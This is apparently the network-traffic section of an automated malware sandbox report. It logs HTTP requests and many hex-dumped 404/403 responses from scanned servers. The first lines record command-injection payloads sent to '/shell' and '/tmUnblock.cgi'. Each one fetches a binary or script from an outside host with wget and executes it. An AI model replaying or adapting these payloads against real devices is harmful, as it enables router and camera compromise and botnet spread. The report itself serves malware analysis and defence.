Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive

Source: unknown

DNS traffic detected: queries for: z.hxhk.cc

Source: unknown

HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus.Data Raw: Data Ascii:

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Type: text/html;charset=utf-8Content-Length: 973Date: Mon, 18 Mar 2024 09:11:45 GMTConnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 36 2e 30 2e 32 36 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 48 4e 41 50 31 2f 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 48 4e 41 50 31 2f 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 28 2f 48 4e 41 50 31 2f 29 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 68 33 3e 41 70 61 63 68 65 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Mon, 18 Mar 2024 08:57:00 GMTContent-Type: text/htmlContent-Length: 150Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 18 Mar 2024 08:57:00 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingETag: W/"6582b674-156"Content-Encoding: gzipData Raw: 66 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 65 90 bd 4e c4 30 10 84 7b 9e c2 58 a2 74 9c 13 5d 7e ae 01 6a 28 68 a8 90 63 6f ce 96 6c af 65 6f c8 85 a7 07 27 5c 45 b5 df ac 76 67 a4 19 ee 9f 5f 9f de 3f de 5e 98 a5 e0 cf 77 c3 31 18 1b dc 9c 55 00 56 b2 1e b9 25 4a a5 93 52 7b 5c cc aa b6 22 0a 29 72 5a 68 8c 04 91 9a f2 d8 2c 45 80 2a 24 4e 8d 0a ea 1b a3 5a 4b a3 31 48 c8 19 f3 67 52 17 90 41 b9 7a ae a2 06 61 b0 2a 11 54 4a 2e 5e 9a 1a cb d9 1e 39 61 36 90 47 de 72 56 68 f3 30 72 fc 82 3c 7b 5c 3b eb 8c 81 d8 df b4 b8 fe db 6c b7 8d 05 77 b1 d4 9d da f6 a1 5f 9d 21 7b 60 c2 e2 c8 61 ec d4 54 d0 2f 04 3d 61 ea da 74 ed 3d cc b4 43 de 1f 2b 4d 48 84 a1 22 67 87 df c8 ab 0b 67 bb e3 9f 38 0f f2 e8 ea b7 3d b9 d7 c7 7e 00 d9 11 de 34 56 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: f7eN0{Xt]~j(hcoleo'\Evg_?^w1UV%JR{\")rZh,E$NZK1HgRAzaTJ.^9a6GrVh0r<{\;lw_!{`aT/=at=C+MH"gg8=~4V0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon Mar 18 11:57:00 2024Server: tr069 http serverContent-Length: 15Connection: closeContent-Type: text/plain; charset=ISO-8859-1Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: File not found
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 NOT FOUNDContent-Length: 232Content-Type: text/html; charset=utf-8Date: Mon, 18 Mar 2024 08:57:01 GMTServer: waitressData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 33 2e 32 20 46 69 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon Mar 18 11:57:00 2024Server: tr069 http serverContent-Length: 15Connection: closeContent-Type: text/plain; charset=ISO-8859-1Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: File not found
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnlyConnection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Mon, 18 Mar 2024 08:57:02 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipData Raw: 37 32 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 fa 86 7a 46 46 7a 86 c8 4a f4 61 86 ea 43 1d 04 00 97 8d 7f bd 99 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 72(HML),I310Q/Qp/K&T$dCAfAyyyzFFzJaC0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 28 Jun 1970 00:23:19 GMTServer: webX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundData Raw: Data Ascii:
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Mar 2024 08:57:05 GMTServer: ApacheX-Powered-By: PHP/7.4.33Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0, no-storeLink: <http://new.watermarkhomeloans.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Type: text/html; charset=UTF-8Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 62 6f 78 65 64 2d 6c 61 79 6f 75 74 20 73 6b 69 6e 2d 74 65 61 6c 2d 67 72 65 79 20 20 73 74 64 2d 73 65 6c 65 63 74 6f 72 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 2f 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 2f 3e 0d 0a 3c 21 2d 2d 20 41 64 64 20 47 6f 6f 67 6c 65 20 53 69 74 65 20 56 65 72 69 66 69 63 61 74 69 6f 6e 20 43 6f 64 65 20 2d 2d 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 6f 6f 67 6c 65 2d 73 69 74 65 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 51 74 6d 51 66 4e 45 33 5f 4f 57 55 35 30 4a 4d 6d 46 45 71 39 46 63 55 57 66 6b 56 38 4c 43 74 62 72 4b 58 44 63 31 6d 4e 77 4d 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 57 61 74 65 72 6d 61 72 6b 20 48 6f 6d 65 20 4c 6f 61 6e 73 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 0d 0a 20 20 20 20 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6e 65 77 2e 77 61 74 65 72 6d 61 72 6b 68 6f 6d 65 6c 6f 61 6e 73 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 6e 65 78 75 73 2f 63 73 73 2f 39 36 30 2f 39 36 30 2e 63 73 73 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6e 65 77 2e 77 61 74 65 72 6d 61 72 6b 68 6f 6d 65 6c 6f 61 6e 73 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 6e 65 78 75 73 2d 63 68 69 6c 64 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 57 61 74 65 72 6d 61 72 6b 20 48 6f 6d 65 20 4c 6f 61 6e 73 20 46 65 65 64 22 0d 0a 20 20 20 20 20 20 20 20 20 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6e 65
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Type: text/html;charset=utf-8Content-Length: 1008Date: Mon, 18 Mar 2024 08:57:08 GMTData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 42 6f 73 73 20 57 65 62 2f 32 2e 31 2e 33 2e 47 41 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 28 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 29 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: Apache-Coyote/1.1Content-Type: text/html;charset=utf-8Content-Length: 1008Date: Mon, 18 Mar 2024 08:57:08 GMTData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 42 6f 73 73 20 57 65 62 2f 32 2e 31 2e 33 2e 47 41 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 41 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 68 31 3e 3c 48 52 20 73 69 7a 65 3d 22 31 22 20 6e 6f 73 68 61 64 65 3d 22 6e 6f 73 68 61 64 65 22 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 20 3c 75 3e 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 75 3e 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 3c 75 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 28 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 29 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 75 3e 3c 2f 70 3e 3c 48 52 20 73 69 7a 65 3d 22 31
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 18 Mar 2024 08:58:11 GMTServer: ApacheAccept-Ranges: bytesCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Keep-Alive: timeout=5, max=100Connection: Keep-AliveTransfer-Encoding: chunkedContent-Type: text/htmlData Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 